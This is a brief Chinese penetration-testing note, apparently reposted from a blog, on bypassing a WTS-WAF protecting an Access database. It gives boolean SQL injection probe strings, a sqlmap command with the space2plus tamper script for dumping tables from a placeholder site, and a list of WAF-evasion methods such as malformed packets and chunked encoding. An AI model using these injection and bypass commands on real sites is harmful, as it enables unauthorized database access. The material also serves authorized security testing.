渗透测试

绕Waf实战案例

WTS-WAF - Access数据库

检测:
?id=1+AND+1=1
?id=1+AND+1=2

绕过:

sqlmap.py -u http://www.xx.com/project.asp?id=29 --tables --tamper space2plus.py

 

绕Waf姿势

一:畸形包绕过

二:正向数据绕过

三:分块绕过
https://www.anquanke.com/post/id/203880  

2020年腾讯门神WAF众测总结
https://security.tencent.com/index.php/blog/msg/151
原文地址:https://www.cnblogs.com/AtesetEnginner/p/11474026.html